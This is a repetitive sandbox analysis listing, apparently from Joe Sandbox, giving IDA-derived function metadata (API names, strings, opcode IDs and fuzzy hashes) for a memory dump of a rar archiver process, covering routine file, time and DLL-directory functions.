                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                                      • API String ID: 233258989-2277559157
                                                                                                                                                                                                                                      • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                      • Instruction ID: e77bb15eac4cf3a18516fd20348f0b7307e5a3f9066c205ce9fd358450cc1525
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB02BE22B1868286EA74DA3592453FE73D1EF51B80F1404F9DA8ECB782DF7DE8558381
                                                                                                                                                                                                                                      Function 00007FF69A401634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                                      • String ID: rtmp%d
                                                                                                                                                                                                                                      • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                                      • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                      • Instruction ID: 3e4c80ea38a0c90feb824d354e1725848a62c3fd5b3b2b6f426f7a87eba6365d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F517C62A18A9645EB70AB25D8005FE72D0FF62F84F5110F1DD0ECBA9ADF28E605D740
                                                                                                                                                                                                                                      Function 00007FF69A42B650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                                                                                      • String ID: rar -ioff
                                                                                                                                                                                                                                      • API String ID: 4151682896-4089728129
                                                                                                                                                                                                                                      • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                      • Instruction ID: 0e3e500477e23e5f333d47fcf3466ed7701376224b8ddb094d9d8ba664452d2c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5016D28A59A07C6FB35EB75B85823533E1EF89F01F4814F1D94EC62A0CE3C614AC741
                                                                                                                                                                                                                                      Function 00007FF69A42B470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                      • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                      • API String ID: 667068680-1824683568
                                                                                                                                                                                                                                      • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                      • Instruction ID: 92f3b5176a87dca5f6ce3b4dd5dc60132287bf80eb37c1d611c2641efeb16a7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3F01925A0AB4681EA64DB12F85407573A0EF8AFC0B4C60F0ED1ECB724EE2CE546C300
                                                                                                                                                                                                                                      Function 00007FF69A441ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: +$-
                                                                                                                                                                                                                                      • API String ID: 3215553584-2137968064
                                                                                                                                                                                                                                      • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                                      • Instruction ID: 1c6c773e58b68be3e069f4da5f271763d2e36337e523cb87435f1807b167ed28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A12A066E0D58386FBB49E59D0446B976D6EF00F64FD842F2D69AC36C0EF2CE6918304
                                                                                                                                                                                                                                      Function 00007FF69A3FE49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2092471728-0
                                                                                                                                                                                                                                      • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                      • Instruction ID: 044e71026c42828ec41423c63c99d6951b1c656e002630675ce3018d31ce2fc1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E51863661874586EB70CF15E84016A77E5FB89B98F2002B9EA9DC3B98DF3DD544CB00
                                                                                                                                                                                                                                      Function 00007FF69A42BC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2092733347-0
                                                                                                                                                                                                                                      • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                      • Instruction ID: 77eecba9b37c3036db20deddcfcc6b876ad2e3938caed897aab071822122fa40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61516AB2B146518EEB64CFB4D4445AC37B1FB48B88B50407AEE0E97B58EF38D556CB00
                                                                                                                                                                                                                                      Function 00007FF69A42C254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2092733347-0
                                                                                                                                                                                                                                      • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                      • Instruction ID: 8b3e03ebdd265daaa9c0670bc78479e0716da6ae53bea0f122e34cd418b23e51
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99314C66B146518DFB20CFB5D8801BC37B0FB08B48B54506AEE0ED7A58EF38D895C301
                                                                                                                                                                                                                                      Function 00007FF69A41EB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                                      • API String ID: 0-13699710
                                                                                                                                                                                                                                      • Opcode ID: 7f1be941d93c512069e4008a9a1ae17aa217bb635e404a929dbcb5c6f0d65e8f
                                                                                                                                                                                                                                      • Instruction ID: 3e82f110262750dd5c3503597771cbc9f7957b99a10512f95b93d84813324595
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f1be941d93c512069e4008a9a1ae17aa217bb635e404a929dbcb5c6f0d65e8f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0681B266A0C68285EB70DB24D8122F933D2FF95B88F5041F5DA4DCB6CADE2DE616C740
                                                                                                                                                                                                                                      Function 00007FF69A43E0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                                                                                      • API String ID: 3913153233-629598281
                                                                                                                                                                                                                                      • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                      • Instruction ID: 69408652c9e7692775685ec532c07981c1118dff801065884a43cfff38210ef4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5619F36A0A64286EB34DF25E645A7977D1FB44F98F1485F0EE9A87788DF38F8418700
                                                                                                                                                                                                                                      Function 00007FF69A3FEA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                                      • String ID: $ACL
                                                                                                                                                                                                                                      • API String ID: 2361174398-1852320022
